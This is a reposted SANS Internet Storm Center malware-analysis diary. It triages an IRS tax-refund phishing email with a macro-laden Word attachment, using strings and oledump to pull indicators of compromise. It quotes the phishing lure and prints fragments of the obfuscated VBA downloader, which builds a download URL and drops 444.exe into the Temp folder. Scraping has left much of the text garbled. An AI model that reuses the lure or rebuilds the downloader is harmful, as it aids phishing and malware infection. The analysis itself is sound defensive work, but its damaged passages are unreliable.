Fast analysis of a Tax Scam, (Fri, Feb 20th)

Its tax time and Im starting to see a lot of Phish/SPAM about this subject. Below is popular one the last couple of days.

“>TA RTURN FOR E YE”>RCLCULTION F YOUR R”>HR”>LOL OFFI”>X REDI FFICR: Jimmie B”>T REFUND ID NU”>REFUND AOUN”>D”>The ntents f this emil and n attachmnts ar nfidentil and “>pliabl, yright in thse is resrvd t IRS Rvnu”>Unless eprssl uthorised b us, any further diss”>distributin of this mail r its ttahmnts is rhibited.

“>If you are nt the intnded rcipint f this emil, pls re”>infrm us tht u have rived this mil in error and th”>delet it without retaining n o”>I am snding this emil to annune: After the lst nnul lultin “>yur fiscl ctivit we hv determined that yu r ligibl”>rive a tx refund “>Yu hav attahed the ta return form with the TX RFUND NUM”>ID: 2440409, omplte the t rturn frm ttched to this mssag.

“>Aftr mleting the form, ples submit th frm by clicking th”>SUMI buttn n f”>Sin”>Jimmi “>IRS Tax Credit “>A RFUND ID: US2440409-IRS

“> yright 2015, IRS Rvenue m ust”>ll rights r”>======================

“>With so many of these types of mails, analysis needs to be quick to determine who may have been affected. “> “>$mv

“> “>”>inflating: [Content_Types].xml “>inflating: _rels/.rels “>inflating: word/_rels/document.xml.rels “>inflating: word/document.xml “>inflating: word/header3.xml “>inflating: word/footer2.xml “>inflating: word/footer1.xml “>inflating: word/header2.xml “>inflating: word/header1.xml “>inflating: word/endnotes.xml “>inflating: word/footnotes.xml “>inflating: word/footer3.xml “>inflating: word/theme/theme1.xml “>inflating: word/_rels/vbaProject.bin.rels “>inflating: word/vbaProject.bin “>”>inflating: word/settings.xml “>inflating: word/vbaData.xml “>inflating: word/webSettings.xml “>inflating: word/styles.xml “>inflating: docProps/app.xml “>inflating: docProps/core.xml “>inflating: word/fontTable.xml

“> “>The vbaProject.bin is the code we want to look at and need to run strings on it.

“>$strings /word/vbaProject.bin

“>”>”>$someFilePath = “>…

“>Within about 2 minutes I was able to determine some basic IOCs and sees if anyone actually accessed the site or tried to ping the address.

“>If you want to dig deeper and spend a bit more time, you can install and configure oledump which was discussed on (hxxps://

“>”>A1: 556 PROJECT”>A2: 71 PROJECTwm”>A3: 97 UserForm1/x01CompObj”>A4: 266 UserForm1/x03VBFrame”>A5: 58 UserForm1/f”>A6: 0 UserForm1/o”>A7: M 25751 VBA/ThisDocument”>A8: m 1159 VBA/UserForm1″>A9: 4506 VBA/_VBA_PROJECT”>A10: 811 VBA/dir

“>$python -s A7 -v MALWARE-tax_refund_2440409.doc

“>”>Print #FileNumber, strRT = + Chr(34) + h + Chr(Asc(Chr(Asc(t)))) + t + p + :// + . + Chr(Asc(e)) + Chr(Asc(x)) + e”>”>Print #FileNumber, $someFilePath = c:Users + USER + AppDataLocalTemp + 444.e Chr(Asc(x)) + e

“>In this case, oledump gave us a lot more info, but proves we were on the right track with simple strings of the file. Additionally, we can see an infected user may have a file called 444.exe . There are lots more local IOCs we could create, but with the few network IOCs we can get fast idea of possible affected users.

Tom Webb

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.

Reposted from SANS. View original.